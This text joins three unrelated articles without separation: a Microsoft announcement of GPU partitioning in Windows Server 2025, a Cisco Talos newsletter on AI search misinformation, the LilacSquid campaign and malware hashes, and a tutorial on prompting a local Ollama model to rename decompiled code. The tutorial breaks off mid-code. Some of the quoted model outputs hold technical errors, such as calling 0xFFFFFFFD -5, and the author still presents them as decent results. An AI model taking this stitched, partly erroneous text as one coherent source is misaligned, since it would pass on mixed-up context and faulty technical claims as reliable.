
Introducing GPU Innovations with Windows Server 2025

Afia Boakye and Rebecca Wambua

 

AI empowers businesses to innovate, streamline operations, and deliver exceptional value.  With the upcoming Windows Server 2025 Datacenter and Azure Stack HCI 24H2 releases, Microsoft is empowering customers to lead their businesses through the AI revolution.

 

Here is what Hari Pulapaka, GM of Windows Server at Microsoft, says about how Windows Server empowers customers with AI: "Windows Server 2025 is well positioned to help our customers be part of the AI revolution with its advanced GPU capabilities, allowing our customers to do training, learning, or inferencing using powerful NVIDIA GPUs."

 

GPUs are essential for AI due to their parallel processing capabilities and highly scalable architecture. Using the upcoming OS releases, Microsoft's customers can assign an entire GPU to a VM, which can run either Linux or Windows Server, in a failover cluster using Discrete Device Assignment (DDA). This means that mission-critical AI workloads can easily run in a clustered VM and, upon an unexpected fault or a planned move, the VM will restart on another node in the cluster, using a GPU on that node.

 

GPU Partitioning (GPU-P) is a powerful new capability we are adding with Windows Server 2025. GPU-P empowers customers to partition a supported GPU and assign those partitions to different VMs in a failover cluster.  This means that multiple VMs can share a single physical GPU, giving each VM an isolated fraction of the physical GPU's capabilities. 

 

Further, after a planned or unplanned move, the VMs will restart on different nodes in the cluster, using GPU partitions on those nodes. Besides enabling clustered VMs to use GPU-P, the upcoming OS releases are bringing live migration to VMs using GPU-P. Live migration for GPU-P enables customers to balance mission-critical workloads across their fleet and to conduct hardware maintenance and software upgrades without stopping their VMs.

 

Windows Admin Center (WAC) empowers customers to configure, use, and manage VMs using virtualized GPUs. WAC enables administrators to manage GPU virtualization for both standalone servers and failover clusters from a single, centralized location, thereby reducing management complexity.

 

The screenshots below highlight GPU-P management in WAC, demonstrating how users can seamlessly view, configure, and assign GPU partitions to VMs.

 

In this first image, customers can view a comprehensive list of their partitioned GPUs.

 


Figure 1: The GPU partitions inventory page

 

Customers can partition eligible GPUs with their desired number of partitions.


Figure 2: The partition count configuration page

 

Finally, customers can assign GPU partitions to different VMs.


Figure 3:  The GPU partition assignment tool

 

These high-value GPU innovations are a result of Microsoft's and NVIDIA's continual close collaboration.

 

Here is what Bob Pette, Vice President of Enterprise Platforms at NVIDIA, has to say: "GPU virtualization requires advanced security, maximum cost efficiency, and accurate horsepower. With GPU-P now available on NVIDIA GPUs in Windows Server Datacenter, customers can meet these requirements and run their key AI workloads to achieve next-level efficiencies."

 

Windows Server 2025 is now available for customers to try out.  Click here to download preview media and use these powerful new capabilities.

 

The sliding doors of misinformation that come with AI-generated search results

6 June 2024 at 18:00

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While these mix-ups are hilarious, I'm worried about the potential implications these features may have for misinformation and fake news on topics that are more important, or easier to believe, than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For "hard" news topics, Google isn't displaying AI-generated results at all; for example, I got no AI Overview when searching for "Who should I vote for in the 2024 presidential election?" or "Does the flu vaccine really work?" 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 


Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 


Bing, Microsoft's direct competitor to Google's search engine, is also using its own form of AI-curated content to answer queries.  

My concern here is what happens when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip-up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week's episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we'd like to think, and a quick and easy summary that appears after they type a question into a search engine is likely going to be good enough for most users on the internet. Even asking someone to click through to the second page of Google's search results is usually asking too much.  

AI's integration into search engines could change the way many of us interact with the internet; I've used Google's search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don't want to assume this will become a problem: perhaps companies will sort the issues out, or AI Overviews won't come for news topics more serious than general life questions. But so far, the results don't inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called "LilacSquid" targeting the IT and pharmacy sectors, looking to maintain persistent access on victims' networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader."

Why do I care? 

LilacSquid's victimology includes a diverse set of victims: information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe, and the pharmaceutical sector in Asia, indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain's capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.'s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg) 

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that they had dismantled a botnet called "911 S5," arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People's Republic of China native, is charged with creating and disseminating "malware to compromise and amass a network of millions of residential Windows computers worldwide," according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony "free" VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target's device into a traffic relay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security) 

In a separate law enforcement campaign called "Operation Endgame," law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed "Odd." "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the critical importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

6 June 2024 at 19:09

Large Language Models (LLMs) such as those provided by OpenAI (GPT-3/4), Google (Gemini), and Anthropic (Claude) can be useful tools to include when conducting security audits or reverse engineering; however, one of the main downsides of using them is that the data you are reviewing is processed server side, meaning anything analyzed by the tool must be uploaded/sent to the provider's servers.

While these services provide privacy policies that may double pinky swear your data is safe and will not be used for training if you opt out, as consultants we are often working with client data that is under NDA, preventing the use of these services. Even where no NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this, with OpenAI publicly confirming that it monitors the usage of its service to identify potentially 'evil' usage by bad actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • service may go away (outage/sale)
  • modified to prevent malicious use (RE/Exploitation often flagged)
    • potentially resulting monitoring/account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging an LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and the model parameter count - this can be thought of as the amount of 'knowledge' or data stored within the model; more parameters generally means more 'knowledge' the model can reference based on your input. OpenAI does not provide details for GPT-4. GPT-3 was 100+ billion parameters, while GPT-3.5's size has not been disclosed; speculation/research/guessing indicates it is much smaller (~22b parameters), due to fine-tuning and/or other 'secret sauce'. GPT-4 is speculated to be in the trillion-plus parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range. This is obviously a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.
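
As a quick illustration of that rule of thumb, the arithmetic for the weights alone might look like the following (a rough estimate only; actual usage also depends on context length, KV cache, and runtime overhead):

def estimate_weight_memory_gb(params_billion: float, bits_per_param: int = 16) -> float:
    """Rough size of the model weights alone; ignores KV cache and runtime overhead."""
    bytes_per_param = bits_per_param / 8
    return params_billion * 1e9 * bytes_per_param / (1024 ** 3)

print(f"7b @ 16-bit: ~{estimate_weight_memory_gb(7, 16):.1f} GB")  # ~13 GB
print(f"7b @ 4-bit:  ~{estimate_weight_memory_gb(7, 4):.1f} GB")   # ~3.3 GB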

When it comes to the actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally with 24GB of VRAM, meaning an NVIDIA 3090 or 4090; a used 3090 is the best value for a turnkey solution. The next best setup is going to be an Apple Silicon (ARM) MacBook/Studio/etc. While this may be contentious, it is difficult to match the performance due to the shared memory architecture, as you are able to use system RAM for compute without a performance hit. It is possible to run these models from system RAM using the CPU on x86/64 machines, but there is a performance hit compared to the previous options and results are most likely going to be slow. Of course there are caveats here; as with anything, you will find cases where highly tuned setups perform well. In this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally; in this case I am using Ollama as it just works and is fairly batteries-included for most use cases. Ollama provides installers for macOS, Linux, and Windows. Downloading and running a local model is as easy as executing ollama run with a model name from the registry; the required files will automatically download and you will be dropped into an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case to apply it to; in this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models whose training data includes code should be able to aid with this task; here I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size, and I really wanted to target something that would be relatively performant on lower-end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}
```

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response looks promising, but using it programmatically would be difficult. We can do better by adjusting our prompt to instruct the model to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these is ideal, as we only want the JSON structure so we can parse it programmatically. By adjusting the prompt we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better: it follows our instructions and produced only a valid JSON structure. However, if we run the same input again, the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path, changing the instructions to describe what the expected output should be for a given input, but eventually the response will deviate in some way and break our ability to interface with it programmatically. Instead of trying to describe what we want, we can provide an example of what we want it to generate (single/multi-shot prompting). An important thing to remember when dealing with an LLM is that it predicts the next token/word to output based on the current input; by providing an example exchange you create a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},{"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the same instructions as before, as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we could even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that performs the specific task we want relatively well, and the response is parsable JSON suitable for automated use.
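
When consuming these responses programmatically, it can still be worth guarding against the occasional stray text around the JSON. The helper below is a minimal, hypothetical sketch (not part of the original workflow) that pulls the first balanced JSON object out of a reply before parsing it:

import json

def extract_first_json(text: str):
    """Best-effort extraction of the first JSON object found in a model reply.

    Returns the parsed object, or None if nothing parsable is found so the
    caller can retry the prompt or log the raw response for inspection.
    Note: braces inside string values can confuse this simple scanner.
    """
    start = text.find("{")
    while start != -1:
        depth = 0
        for i, ch in enumerate(text[start:], start):
            if ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
                if depth == 0:
                    try:
                        return json.loads(text[start:i + 1])
                    except json.JSONDecodeError:
                        break  # candidate was not valid JSON, try the next '{'
        start = text.find("{", start + 1)
    return None

# example: tolerate prose before/after the JSON the model was asked for
reply = 'Sure! {"function_name": "process_byte_value", "comment": "...", "variables": []} Hope that helps.'
print(extract_first_json(reply)["function_name"])  # process_byte_value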

Light Customization

In the case that you have a specific use case (agent/assistant/task), you can configure a version of the underlying pre-trained weights through Ollama's Modelfile interface. A Modelfile provides a lightweight layer to control/configure the precomputed weights and can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},{"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To sidetrack for a second: each model has its own prompt format that must be used, as well as specific tokens to indicate what is an instruction and start/stop tokens - these values can be found within the tokenizer configuration file (tokenizer_config.json). For instance, Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.
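
If you want to confirm what a given model's chat template actually renders to, the transformers tokenizer can show you. A quick check might look like this (assuming the transformers package is installed and the model's tokenizer files can be downloaded):

from transformers import AutoTokenizer

# Mistral-7B-Instruct wraps user turns in [INST] ... [/INST] and uses <s>/</s>
tok = AutoTokenizer.from_pretrained("mistralai/Mistral-7B-Instruct-v0.1")

messages = [{"role": "user", "content": "Analyze the following code: ..."}]

# tokenize=False returns the fully formatted prompt string instead of token ids
print(tok.apply_chat_template(messages, tokenize=False))
# -> <s>[INST] Analyze the following code: ... [/INST]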

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md); this can be used as seen in the following simple Python client:

import requests,json

def do_analysis(code):
